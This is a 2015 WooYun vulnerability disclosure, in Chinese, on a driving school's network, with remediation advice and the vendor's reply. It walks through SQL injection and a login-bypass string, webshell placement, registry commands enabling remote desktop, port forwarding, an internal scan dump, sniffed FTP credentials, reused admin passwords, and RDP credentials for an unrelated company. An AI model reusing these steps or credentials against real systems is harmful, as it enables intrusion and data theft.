当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091959

漏洞标题:东方时尚一些安全问题导致内网渗透

相关厂商:dfss.com.cn

漏洞作者: 我了个去

提交时间:2015-01-15 10:40

修复时间:2015-03-01 10:42

公开时间:2015-03-01 10:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-15: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-03-01: 细节向公众公开

简要描述:

多个安全问题,不容忽视。

详细说明:

一、服务器内网安全问题
http://www.dfss-club.com/class/class.jsp?id=16 sql注入
http://www.dfss-club.com/admin/index.jsp 后台登录地址 存在万能口令 admin' or 1=1--
成功登录后台后地址 http://www.dfss-club.com/admin/MyJspkja452asdfdfdsldfijkl.jsp
getshell:
登录后台后获取物理路径:
E:\Tomcat 5.0\webapps\club\index.jsp
结合sql注入写入菜刀一句话木马
http://www.dfss-club.com/img/main.jsp pass: test
E:\Tomcat 5.0\webapps\club\img\> whoami
nt authority\system
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
system权限,内网
机器安装有360 参考 WooYun: 轻松干掉360安全卫士主防(不止360哦) 直接秒掉 加用户 上传恶意二进制文件 改注册表毫无压力
2003开启远程桌面:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
tasklist /svc netstat -ano 查询得知远程桌面端口33898
lcx端口转发:
下载lx.exe到c:\windows目录,进行端口转发
成功登录远程桌面
内网扫描
使用x-scan对内网进行扫描进行信息探测
主机 检测结果
192.168.1.154 发现安全漏洞
主机摘要 - OS: Windows 2003; PORT/TCP: 23, 80, 135, 139, 445, 1521, 8080
192.168.1.158 发现安全漏洞
主机摘要 - OS: Windows Version 6.0; PORT/TCP: 80, 135, 139, 445, 1433, 8080
192.168.1.153 发现安全漏洞
主机摘要 - OS: Windows Version 6.1; PORT/TCP: 135, 139, 445, 1433, 3389
192.168.1.155 发现安全漏洞
主机摘要 - OS: Windows NT 6.0; PORT/TCP: 80, 135, 139, 443, 445, 1025, 1027, 1433, 3389, 8000, 8080
192.168.1.90 发现安全漏洞
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 80, 443, 8000
192.168.1.4 发现安全漏洞
192.168.1.219 发现安全漏洞
主机摘要 - OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 135, 139, 445, 1025, 1521
192.168.1.159 发现安全漏洞
主机摘要 - OS: Windows Version 6.0; PORT/TCP: 80, 135, 139, 445, 1433, 8080
192.168.1.66 发现安全漏洞
主机摘要 - OS: Unknown OS; PORT/TCP: 21, 80, 135, 139, 445, 1521, 3306, 3389, 5800, 5900, 5901
192.168.1.32 发现安全警告
主机摘要 - OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 7, 9, 13, 19, 53, 80, 135, 139, 445, 1027
192.168.1.200 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 443, 8080
192.168.1.107 发现安全警告
主机摘要 - OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 25, 80, 110, 135, 143, 465, 993, 995, 1025, 6000
192.168.1.62 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 5800, 5900, 5901
192.168.1.63 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 135, 139, 445, 5800, 5900, 5901
192.168.1.64 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 5800, 5900, 5901
192.168.1.65 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 135, 139, 445, 5800, 5900, 5901
192.168.1.61 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 135, 139, 445, 3389, 5800, 5900, 5901, 8000
192.168.1.99 发现安全警告
192.168.1.104 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 135, 139, 1025, 1521, 3389, 8080
192.168.1.231 发现安全警告
主机摘要 - OS: Linux 2.4.X|2.5.X|2.6.X; OS details: Linux 2.4.18 - 2.6.7; PORT/TCP: 22, 443
192.168.1.1 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 23, 80, 443
192.168.1.60 发现安全警告
主机摘要 - OS: Linux 2.4.X|2.5.X|2.6.X; OS details: Linux 2.4.18 - 2.6.7; PORT/TCP: 22, 111, 1521, 5900
192.168.1.254 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 23, 80, 443
192.168.1.78 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 80, 443, 8000
192.168.1.101 发现安全警告
主机摘要 - OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 80, 135, 139, 445
192.168.1.79 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 80, 443, 8000
192.168.1.85 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 53
192.168.1.251 发现安全警告
主机摘要 - OS: IBM AIX 4.X, Microsoft Windows 2003/.NET|NT/2K/XP; OS details: IBM AIX 4.3.2.0-4.3.3.0 on an IBM RS/*, Microsoft Windows Server 2003, Microsoft Windows XP SP2 (firewall enabled); PORT/TCP: 80, 139, 445
192.168.1.120 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 3389
192.168.1.71 发现安全警告
主机摘要 - OS: Unknown OS; PORT/TCP: 53, 135, 139, 445, 3389
192.168.1.98 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 443, 445
192.168.1.96 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 443
192.168.1.15 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 3389, 8000
192.168.1.82 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 8080
192.168.1.77 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 1433
192.168.1.74 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 135, 139, 445, 3389
192.168.1.83 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 135, 139, 445, 3389
192.168.1.86 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 135, 139, 443, 445, 3389
192.168.1.151 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 8080
192.168.1.18 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 1433
192.168.1.97 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 445
192.168.1.84 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 445
192.168.1.202 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 3306, 3389, 8080
192.168.1.73 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 80, 111, 3306
192.168.1.30 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 111, 1521
192.168.1.75 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 111
192.168.1.31 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 111
192.168.1.33 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 111
192.168.1.102 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 80, 3306
192.168.1.103 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 80, 3306
192.168.1.72 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22, 80
192.168.1.50 发现安全提示
主机摘要 - OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 445
192.168.1.171 发现安全提示
主机摘要 - OS: Linux 2.4.X|2.5.X|2.6.X; OS details: Linux 2.4.18 - 2.6.7, Linux 2.4.20 (Itanium), Linux 2.4.3 SMP (RedHat), Linux 2.4.7 through 2.6.3, Linux 2.6.0 (x86), Linux 2.6.0-test5 - 2.6.0 (x86), Linux 2.6.3 - 2.6.7, Linux kernel 2.6.4 (x86); PORT/TCP: 80, 3306, 8000
192.168.1.114 发现安全提示
192.168.1.105 发现安全提示
192.168.1.19 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 21, 80
192.168.1.22 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22
192.168.1.23 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 22
192.168.1.29 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 1433
192.168.1.76 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 3389
192.168.1.198 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 21
192.168.1.13 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 80
192.168.1.140 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 21
192.168.1.130 发现安全提示
主机摘要 - OS: Unknown OS; PORT/TCP: 3306
本机嗅探
使用x-sniff对本地局域网同一交换下被动嗅探获取ftp密码
TCP [12/24/14 18:01:03]
192.168.1.4->192.168.1.198 Port: 2261->21
USER root
TCP [12/24/14 18:01:03]
192.168.1.4->192.168.1.198 Port: 2261->21
PASS dfss0425
登录ftp,获取大量敏感信息,包括网络拓扑图,机器密码,网络设备(路由交换密码,ip分配等) 经测试,密码均可登录
比如 \\192.168.1.154\c$ (约车服务器)用户名administrator 密码Dfss_!@#$%^
通过分析,密码很有规律,总结得出常用密码:Dfss_!@#$%^ Dfss_!@#$%^&* Dfss_(WEBAPPNAME)!@#$%^&* dfss0425 等
虽然有些机器没开3389,但是开了smb共享,利用pstools套件里的psexec 在知道用户名密码情况下同样可以对其进行渗透。
二: 咖啡厅
机器没有安装还原软件或者还原卡,以及“网维” 软件,没有进行安全加固,可轻松读取机器密码,所有上网机密码一样americano ,在机器中可以提取他人上网记录和个人隐私文件。 比如,我在上网机上捡到一些东西中 其中有一个服务器的3389
一个医疗体检单位的内网3389:
124.207.153.74 ikangcw ikangcw 本来可以单独提交wooyun 服务器弱口令或者再来个内网渗透的,想想算了,一块提交了吧。
三: 约车大厅约车机器缺陷
机器刚开机初始化后,没有隐藏任务栏,可以直接对机器进行计算机常用操作,可以获取到约车客户端网段,程序打印空的约车记录单时,会报错,爆出路径同时也可以获取到约车服务端ip地址(192.168.1.154:8080)
四:另外东方时尚租车网也存在注入漏洞
http://www.dfsszc.com/NewsList.aspx?m=20131120105122323641%27%20and%20%27a%27=%27a
http://www.dfsszc.com/NewsList.aspx?m=20131120105122323641%27%20and%20%27a%27=%27b

漏洞证明:

截图18.png


截图17.png


截图00.png


截图01.png


截图02.png


截图03.png


截图04.png


截图05.png


截图06.png


截图07.png


截图08.png


截图09.png


截图10.png


截图11.png


截图12.png


截图13.png


IMG_0910.JPG


IMG_0911.JPG


IMG_0912.JPG


截图15.png


截图16.png


截图19.png

修复方案:

一、咖啡厅上网机安装还原卡或还原软件(比如雨过天晴) 以及类似网吧的万象软件
二、预约大厅预约机需要微调下,隐藏任务栏。
三、修复sql注入漏洞,清除webshell,修改内网中服务器常用密码以及路由设备的常用密码
本人刚从dfss毕业,感谢学校教授了我驾驶技能 和 颁发给我驾照,顺便问下,外地人不够5年社保,怎么搞一个京牌啊?

版权声明:转载请注明来源 我了个去@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-16 16:33

厂商回复:

感谢对我校的支持,我们已经在着手就存在的问题进行整改。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-26 12:01 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    多年后发现这个漏洞碉堡啊,改成正常rank奖励 :)

  2. 2015-09-02 19:12 | 日出东方 ( 普通白帽子 | Rank:157 漏洞数:51 )

    @疯狗 大哥给我改几个呗